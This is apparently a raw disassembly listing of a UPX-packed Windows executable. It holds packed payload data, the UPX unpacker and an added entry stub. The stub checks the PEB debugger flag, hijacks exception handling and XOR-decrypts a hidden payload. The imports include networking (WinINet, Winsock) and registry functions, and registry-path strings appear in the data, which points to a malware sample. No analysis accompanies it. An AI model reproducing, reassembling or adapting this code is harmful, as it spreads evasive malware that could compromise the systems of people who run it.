dd 40023FFh, 0D6140A11h, 20D8D46Eh, 69DBD405h, 244B4C00h
dd 53F443F8h, 97B75053h, 4AE00882h, 8F6FC0BBh, 6E240057h
dd 6F006400h, 3A730075h, 9B62F6F6h, 9013074h, 3500398Ch
dd 0B6E60323h, 72E1D44h, 7901DA00h, 8AB644Eh, 9C19DA20h
dd 9F579264h, 80F20003h, 46D8360Ch, 40074723h, 0F2373FFEh
dd 10060006h, 8A151F01h, 48E088h, 0EC44004Fh, 0FE88DFFFh
dd 0F27A6A19h, 281C49E4h, 742530AFh, 0E1536710h, 89BE429h
dd 7575DF5Ch, 30E5B5CDh, 75C0400h, 5C085ABDh, 0EEBB91B1h
dd 72E4D61h, 2E380036h, 6C4CD977h, 491B30BBh, 0E843EC00h
dd 0C8073F00h, 6463D873h, 0F90708A2h, 4DCCB6Fh, 0FF1640h
dd 0E00DEDEh, 19F1600h, 0B090984Dh, 28402602h, 0FBEE1A36h
dd 8B110319h, 0D374D96Ch, 65DF2170h, 9C2A9B0Dh, 9EC0256Bh
dd 109F4B6Dh, 1B04480Eh, 0EEBAEB6Eh, 5A541354h, 22596326h
dd 0F9A4C75Ch, 45CB7DCFh, 58765h, 4810030Bh, 1EF62FFFh
dd 0EB810B8h, 286A050Bh, 0B10C3919h, 0FF0B11D0h, 0A89BFF63h
dd 0D94FC000h, 5D5FF52Eh, 1CEB8A88h, 0E89F11C9h, 91732B3Ch
dd 4810ECBDh, 0F40CD160h, 21E460A3h, 0CA0E4AFh, 0CB10CA0h
dd 191C9DFh, 880CA000h, 3C230040h, 9F7C9h, 703ECh, 4F401495h
dd 36452F7Ch, 0BF4070D8h, 13430700h, 136447FEh, 138578h
dd 0E9A65BABh, 204E7813h, 2FF810CFh, 860EFEFFh, 23C6A2C1h
dd 8408BE40h, 0E93EE9Fh, 10B94388h, 0B801FFEEh, 93C9B310h
dd 0AD200C27h, 0AF2C070Dh, 0F7F0F90h, 700118D8h, 0F92BC87Ch
dd 0F840F84h
dd 0F2000F95h, 28037E4h, 6C0F847Fh, 3C25560Fh, 0A89A006Ch
dd 4460496Fh, 1F1343F6h, 0FE560536h, 50586E69h, 725020h
dd 227E4446h, 3901D9E4h, 123C6B32h, 6B027515h, 4149E420h
dd 941C0053h, 0D910E57Fh, 0C606EB01h, 0CB255C5Ch, 73FCDFFFh
dd 6370695Ch, 0EC816624h, 0E4FF071Ch, 44655300h, 67756265h
dd 0A8C7D169h, 678576A9h, 6A6441A7h, 64CDB775h, 6F5461BFh
dd 176E656Bh, 126F4C73h, 0EDFB7075h, 615624FEh, 4165756Ch
dd 28704F17h, 5224636Fh, 736C6A47h, 76430034h, 951B3F61h
dd 0E333C18Ah, 0DF6D4C79h, 29288168h, 545F1165h, 0A96D6172h
dd 5779C4AEh, 31431735h, 0DCEA1A61h, 6852A96Dh, 6854056Fh
dd 5B56140Ch, 73951ADBh, 284158DBh, 6B3D454Fh, 7778A99Bh
dd 47356E3Ah, 44B8F3F5h, 481E2FA3h, 7F505454h, 9532203Ch
dd 5797EF7Ah, 0D4B4F20h, 9F4B010Ah, 0ADDB56FBh, 4C2D0244h
dd 3A2D6704h, 18752520h, 3652C3DAh, 7954282Fh, 0D5B533B5h
dd 70A326D6h, 15836386h, 6AD4754Fh, 2DC7022Fh, 8C5A7293h
dd 9FC972B5h, 3D004757h, 2B151ADAh, 0E564F6F4h, 0D2BFDA16h
dd 6D8D73CBh, 0A9637673h, 5BBE77CBh, 0F1695A9Ch, 175F3203h
dd 3174D375h, 7B5E7D7h, 0E9363703h, 354D764Eh, 69331B34h
dd 0E4320333h, 31A696EBh, 38133930h, 4190373Bh, 7361B06h
dd 6413435h, 32336419h, 84D4AD31h, 0E77830D4h, 0ADCDC03Ah
dd 0AF67FFCAh, 54464F53h, 45524157h, 0F5694D5Ch, 0B62C1F86h
dd 0B35CCB6Fh, 7275435Ch, 1C580972h, 0D056B6EEh, 525CFE73h
dd 0FDD0B875h, 5576861Dh, 67279BF0h, 7264736Eh, 6E57796Ah
dd 6523B7B2h, 495300EEh, 96C305F2h, 6C0E57B0h, 6E6E8B39h
dd 57520AE5h, 534449EFh, 875C4320h, 673A01BBh, 17F57620h
dd 9EE64876h, 325CADBDh, 5320639Dh, 642C4410h, 1B65D92Fh
dd 3F23871Ah, 17B7337Eh, 73798312h, 0AC42004Ch, 3F1B1A35h
dd 233D9B20h, 8D6A1513h, 206D1B5Bh, 6D8E0654h, 3780C02Ch
dd 0EA20BC44h, 9EC96C66h, 6D672FBBh, 24632A9Ch, 0F6B11363h
dd 74690A2Fh, 614D2079h, 0DE1A1E6Eh, 0B08A6BA7h, 408BC400h
dd 1836DE32h, 65A846ECh, 80DDF90Ch, 470DDB1Bh, 876F4D53h
dd 0B7014665h, 4E6B374Dh, 1686D61h, 6372D36Ch, 0AE0BBDCEh
dd 70530A95h, 0C50A1979h, 4B724D2Eh, 4E326528h, 6C6C6F81h
dd 679A36D4h, 0CC538C70h, 0B5A688Ah, 191B2B52h, 7332129Ch
dd 0C715D4CDh, 358F540Fh, 0C2D8182Ch, 4E210580h, 0CF69747Ch
dd 612DB0F0h, 76455441h, 0B6DE6B33h, 26618585h, 3C535746h
dd 624F7B67h, 4335866Ah, 442C76D7h, 168D22F5h, 48198B9Ah
dd 0CFC83A0Bh, 0F7B25E48h, 0C645216h, 45E2447h, 8DB0EF7h
dd 5A61D26Eh, 0ACC2BBF0h, 4644E3A1h, 1479BC63h, 0B1B75BD8h
dd 492B1FB5h, 530F6F42h, 32DC6509h, 670B61Ch, 1C26C049h
dd 9B314564h, 0B328166Ch, 73D6366Eh, 0E0DC82C9h, 8DDA0B12h
dd 0CC8D623Fh, 694C2F0Fh, 0DAE0E62h, 0B5677B36h, 7C824D2Bh
dd 6AC04202h, 0B68ED513h, 0CFCD9ED0h, 81695463h, 25657588h
dd 0DEB0EBA1h, 3478E94Dh, 66CD92F6h, 0C45D0DD2h, 59843C39h
dd 5A624F84h, 4B527845h, 0DF31ACD8h, 0C1375E0Ah, 2D90B58Dh
dd 7B591B52h, 3C2ECD81h, 657A8608h, 0AD1BA738h, 154CC42Dh
dd 6FC3FC45h, 0FB3F3BD1h, 0A1673A26h, 4579654Bh, 4587610h
dd 0FC1869Ch, 0BD800A51h, 11F6B584h, 0B30E309Eh, 21E784D8h
dd 820E010h, 0C51F6EDh, 0BE6E6241h, 50A9A110h, 6E5504E4h
dd 9851AC06h, 7774632Dh, 0BF108936h, 0A17DB66h, 0E611244h
dd 1B66697Eh, 79B63AD6h, 758F67CAh, 6F6C362Bh, 0CE436F61h
dd 112C796Fh, 708D036Fh, 8F521067h, 0F90DD00Eh, 14B48F67h
dd 75716341h, 0E7057269h, 494D874Ah, 133AA035h, 9A7C336Dh
dd 7273ECDEh, 0B26D06CAh, 1CE18B16h, 0F920E35h, 9DA15B53h
dd 5F1D4DB9h, 5F3F5844h, 87033173h, 27F9F668h, 2CE20702h
dd 727911B4h, 6633E9AEh, 46C49AB9h, 361D514Dh, 274D01CCh
dd 14150E65h, 2E304C20h, 0BBB4E70Ah, 49DCB615h, 5708466h
dd 4F4166B1h, 669C620Eh, 5A0424F4h, 0F6D85B0h, 419B5585h
dd 0B0DC0E11h, 14671484h, 986E196Bh, 496E031Ah, 81745343h
dd 9632508Ch, 3C0D471Ah, 50D6CB2Ch, 2027375h, 2CB2010Dh
dd 6F39B2CBh, 0CA0C1734h, 9CB2CB2h, 16101304h, 0A41D5B3Fh
dd 96455036h, 40D5FD4Ch, 3A3E5F0Bh, 0B01E04Ah, 26120601h
dd 3B3D82C4h, 0B230E13h, 0BE8CB625h, 20B0756h, 0B99D074Ah
dd 0C506F65h, 8110341Eh, 781BD97h, 2CF40006h, 20376C9Bh
dd 7C648C64h, 76C11E01h, 552E2B8Fh, 90241607h, 0A92304DEh
dd 49F1726h, 0EC642EE0h, 0E13DD60Bh, 2BFB0FA7h, 0E259272Ah
dd 0C0162DD7h, 2A2EFC04h, 0C3h, 1200080h, 0FF00h, 5000BE60h
dd 0BE8D3160h, 0FFFFC000h, 0FFCD8357h, 909010EBh, 90909090h
dd 8846068Ah, 0DB014707h, 1E8B0775h, 11FCEE83h, 0B8ED72DBh
dd 1, 775DB01h, 0EE831E8Bh, 11DB11FCh, 73DB01C0h, 8B0975EFh
dd 0FCEE831Eh, 0E473DB11h, 0E883C931h, 0C10D7203h, 68A08E0h
dd 0FFF08346h, 0C5897474h, 775DB01h, 0EE831E8Bh, 11DB11FCh
dd 75DB01C9h, 831E8B07h, 0DB11FCEEh, 2075C911h, 75DB0141h
dd 831E8B07h, 0DB11FCEEh, 0DB01C911h, 975EF73h, 0EE831E8Bh
dd 73DB11FCh, 2C183E4h, 0F300FD81h, 0D183FFFFh, 2F148D01h
dd 76FCFD83h, 42028A0Fh, 49470788h, 63E9F775h, 90FFFFFFh
dd 0C283028Bh, 83078904h, 0E98304C7h, 1F17704h, 0FF4CE9CFh
dd 895EFFFFh, 7DB9F7h, 78A0000h, 3CE82C47h, 80F77701h
dd 0F275013Fh, 5F8A078Bh, 0E8C16604h, 10C0C108h, 0F829C486h
dd 1E8EB80h, 830789F0h, 0D88905C7h, 0BE8DD9E2h, 4000h
dd 0C009078Bh, 5F8B4574h, 30848D04h, 6000h, 8350F301h
dd 96FF08C7h, 608Ch, 47078A95h, 0DC74C008h, 779F989h, 4707B70Fh
dd 57B94750h, 55AEF248h, 609096FFh, 0C0090000h, 3890774h
dd 0EB04C383h, 9496FFD8h, 61000060h, 0FFB671E9h, 0FFh
dd 0D8h dup(0)
UPX1 ends
; Section 3. (virtual address 00007000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31607000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 70C4h, 708Ch, 3 dup(0)
dd 70D1h, 709Ch, 3 dup(0)
dd 70DEh, 70A4h, 3 dup(0)
dd 70E9h, 70ACh, 3 dup(0)
dd 70F4h, 70B4h, 3 dup(0)
dd 7100h, 70BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
pop ebx
call loc_31607260
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:3160720F�j
jmp short near ptr loc_3160720A+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3160725F
call $+5
xchg eax, ebx
pop ebp
sub ebp, 40232Ah
mov eax, [ebp+402372h]
add eax, [ebp+40237Ah]
mov esi, eax
mov eax, [ebp+402376h]
add eax, [ebp+40237Ah]
push eax
mov edi, esi
xor ecx, ecx
loc_3160724E: ; CODE XREF: UPX2:3160725D�j
lodsb
xor al, [ebp+402382h]
stosb
inc ecx
cmp ecx, [ebp+40237Eh]
jl short loc_3160724E
locret_3160725F: ; CODE XREF: UPX2:31607220�j
retn
; ---------------------------------------------------------------------------
loc_31607260: ; CODE XREF: UPX2:31607201�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], dl
add [eax+6Bh], al
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 316000h, 6000001Eh, 760h dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31609000h
align 2000h
_idata2 ends
end start